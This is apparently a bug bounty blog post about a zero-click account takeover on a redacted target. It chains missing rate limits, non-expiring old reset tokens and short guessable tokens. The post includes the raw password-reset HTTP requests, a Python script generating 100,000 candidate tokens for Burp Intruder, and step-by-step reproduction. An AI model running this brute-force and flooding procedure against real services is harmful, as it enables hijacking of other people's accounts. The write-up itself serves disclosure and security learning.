Open in app

Sign in

Write

Sign in

Zero-Click account Take-over

0xEbn-Taimia
3 min readAug 5, 2024

--

بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ | In the name of God, the most gracious, the most merciful

Edit : The triager has all the right because the token length is too long and will take to many requests which may lead to dos attack so it can be produced with shorter token

Hello hackers, My name is Momen samir (0xEbn-Taimia), Today i’ll be discussing a bug that i recently found on a target on hackerone we will mention to it as target.com

So in the First place this ATO depends on some other bug, let me explains

1- The reset password link has a weak token function (14 digit can guessable

2-There is no rate limit on send new-password link

3- 3- The older token in the link didn’t expired after you got a new one

Now to Reproduce

1- You will need to create a new account and log-out then take the reset password request to burp-intruder

POST /api/v1/password/forgot HTTP/1.1
Host: identity.target.com
Cookie: ;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.target.com/
Content-Type: application/json
X-Client-Platform: web
Content-Length: 42
Origin: https://www.target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers
Connection: close

{"emailAddress":"victim-email@google.com"}

After sending the request you’ll got a link with token like that :

https://www.target.com/account/reset-password?token=14-digits-token

2-Capture the confirm new password request

POST /api/v1/password/forgot/update HTTP/1.1
Host: identity.target.com
Cookie: ;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.target.com/
Content-Type: application/json
X-Client-Platform: web
Content-Length: 42
Origin: https://www.target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers
Connection: close

{"newPassword":"new-password","newPasswordConfirm":"new-password","authorizationCode":"14-digits-token"

But there was some protection “the token expires after 5 minutes “

So, to bypass it and preform the bug we will do the following :

1-Take the two request’s to burp-intruder

1- In the First request (send reset password link request) we will set the payload to null payload and send it

2-in the second request (confirm new password request) we will use some python script to generate 100000 of 14-digits token and send it with intruder

import random
import string
import os

def generate_payloads(num_payloads, length):
    characters = string.ascii_lowercase + string.digits
    payloads = [''.join(random.choices(characters, k=length)) for _ in range(num_payloads)]
    return payloads

num_payloads = 100000  # Set the number of payloads
length = 14
payloads = generate_payloads(num_payloads, length)

file_path = os.path.abspath('payloads.txt')
with open(file_path, 'w') as file:
    for payload in payloads:
        file.write(payload + '\n')

print(f'{num_payloads} payloads of length {length} generated and saved to {file_path}')

So, let me explain

1- In the first request we will set the victim account and send too many password reset links that contains the token

But as the token got expierd after 5 minutes we’ll paybass it by sending too many requests with token’s every second as there is no rate limit

And the older token’s stay valid for 5 miutes after we sent new ones

2-In the main time we send confirm new password request’s with our generated token’s list , so once we got a token is exist on our list we will got a 200 ok and password changed successfully

And Booom! I successfully changed the password of the victim’s account.

The point is we can send a very large number of valid token’s and at the same time we can guess them since the number is not large and can be guessed and the chance of guessing is very high since we can send a lot of token’s and stay valid .

But unfortunately the h1 triage closed it as informative because The DoS attack is out of scope !

in the end we can’t stop saying:

Thank god | الْحَمْدُ لِلَّهِ

Bug Bounty
Cybersecurity
Ato
Bugs

--

--

0xEbn-Taimia
0xEbn-Taimia

Written by 0xEbn-Taimia

114 Followers
10 Following

Junior bug hunter

Responses (1)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams